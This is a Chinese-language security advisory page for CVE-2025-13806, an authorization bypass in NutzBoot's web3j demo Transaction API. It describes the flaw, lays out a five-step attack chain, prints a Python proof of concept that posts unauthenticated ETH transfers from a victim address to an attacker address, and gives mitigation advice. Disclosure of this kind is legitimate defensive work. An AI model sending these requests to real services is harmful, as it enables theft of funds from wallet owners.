CVE-2025-13806 CVSS 7.3 高危

CVE-2025-13806: NutzBoot EthModule Transaction API授权绕过漏洞

披露日期: 2025-12-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13806

漏洞类型

授权绕过

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

nutzam NutzBoot

漏洞概述

CVE-2025-13806是NutzBoot框架中的一个高危安全漏洞，CVSS评分7.3。该漏洞存在于nutzboot-demo-simple-web3j模块的EthModule.java文件中，具体位于Transaction API组件。攻击者可以通过操纵from/to/wei等参数来绕过授权检查，实现未经授权的以太坊交易操作。由于该漏洞可远程利用且无需认证，对使用该框架构建的区块链应用构成严重威胁。漏洞已于2025年12月1日公开披露，漏洞利用代码已在互联网传播。

技术细节

该漏洞属于不适当授权（Improper Authorization）类型。问题出在EthModule.java的Transaction API接口对用户输入的from/to/wei参数缺少适当的权限验证。具体来说：1) API未验证调用者是否有权操作指定的from地址进行交易；2) 未检查to地址的合法性；3) wei参数（交易金额）未设置合理的限制。由于NutzBoot框架的快速启动特性，许多开发者直接使用默认配置部署应用，导致这些接口暴露在公网上。攻击者只需构造特定的HTTP请求，指定任意from地址和交易参数，即可触发未经授权的ETH转账操作。

攻击链分析

STEP 1

步骤1

扫描发现暴露在公网的NutzBoot应用，特别是包含web3j模块的服务

STEP 2

步骤2

识别EthModule的Transaction API端点，通常为/eth/transaction或类似路径

STEP 3

步骤3

构造恶意请求，指定受害者钱包地址为from参数，攻击者控制地址为to参数

STEP 4

步骤4

设置wei参数指定转账金额，发送无认证的HTTP POST请求

STEP 5

步骤5

由于缺少授权验证，API执行转账操作，攻击者获得非法收益

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-13806 PoC - NutzBoot Unauthorized Transfer
# Target: NutzBoot EthModule Transaction API

TARGET_URL = "http://target-server:8080/eth/transaction"

# PoC 1: Unauthorized ETH transfer via from/to/wei parameters
payload = {
    "from": "0xVictimAddress",  # Attacker specifies victim address
    "to": "0xAttackerAddress",   # Attacker specifies destination
    "wei": "1000000000000000000"  # 1 ETH in wei
}

response = requests.post(TARGET_URL, json=payload)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

# PoC 2: Check if API is vulnerable (no auth required)
test_params = {
    "from": "0xTestFrom",
    "to": "0xTestTo",
    "wei": "1000"
}

vuln_test = requests.post(
    f"{TARGET_URL}/send",
    json=test_params,
    headers={"Content-Type": "application/json"}
)
print(f"Vulnerability Test: {vuln_test.json()}")

影响范围

NutzBoot < 2.6.0-SNAPSHOT

nutzboot-demo-simple-web3j 所有版本

防御指南

临时缓解措施

立即检查应用中是否使用了nutzboot-demo-simple-web3j模块，若发现相关Transaction API暴露在公网，应暂时关闭外网访问。同时在API层添加调用者身份验证和from地址所有权确认，确保只有钱包私钥持有者才能发起交易操作。考虑使用专业的区块链安全审计工具对代码进行复查。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表